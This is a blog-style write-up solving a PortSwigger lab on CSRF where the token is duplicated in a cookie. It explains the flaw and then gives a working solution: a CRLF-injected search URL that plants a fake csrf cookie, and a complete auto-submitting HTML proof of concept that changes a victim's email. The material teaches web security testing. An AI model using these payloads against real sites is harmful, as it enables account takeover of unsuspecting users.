CSRF Where Token is duplicated in Cookie | 2023
Portswigger Cross-Site Request Forgery Lab Simple Solution | Karthikeyan Nagaraj
Published in
3 min readFeb 4, 2023
CSRF — Introduction:
- Cross-Site Request Forgery (CSRF) is a type of security vulnerability that affects web applications.
- It occurs when an attacker tricks a user’s browser into sending a malicious request to a web application on behalf of the user, often without the user’s knowledge or consent.
- The attacker takes advantage of the trust that a web application has in a user’s browser, exploiting the fact that the browser automatically includes authentication credentials (such as cookies) with each request.
- This can allow an attacker to perform actions such as changing a password, transferring funds, or accessing sensitive information.
- For example, if a user is logged into their online banking account and visits a malicious website, the attacker could use CSRF to transfer money from the user’s account without their knowledge.
Lab Description:
- This lab’s email change functionality is vulnerable to CSRF. It attempts to use the insecure “double submit” CSRF prevention technique.
- To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer’s email address.
- You can log in to your own account using the following credentials:
wiener:peter
Analysis:
- We know that the Email change Functionality is vulnerable to CSRF, So Let’s capture the Request
2. Send the Request to the Repeater
3. Perform a search, send the resulting request to Burp Repeater, and observe that the search term gets reflected in the Set-Cookie header
4. Since the search function has no CSRF protection, you can use this to inject cookies into the victim user’s browser.
5. Create a URL that uses this vulnerability to inject a fake csrf cookie into the victim's browser:
/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None
6. Generate POC for the Current request
7. Modify the poc and add the below script into the HTML code
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="abc@gmail.com" />
<input type="hidden" name="csrf" value="abc" />
<input type="submit" value="Submit request" />
</form>
<img src="https://YOUR-LAB-ID.web-security-academy.net/?search=abc%0d%0aSet-Cookie:%20csrf=abc%3b%20SameSite=None" onerror="document.forms[0].submit();"/>
</body>
</html>8. Paste the code and Deliver it to the Victim
Feel Free to Ask Queries via LinkedIn and to Buy me a Cofee : )
Thank you for Reading!!
Happy Hunting ~
Author : karthikeyan Nagaraj ~ Cyberw1ng
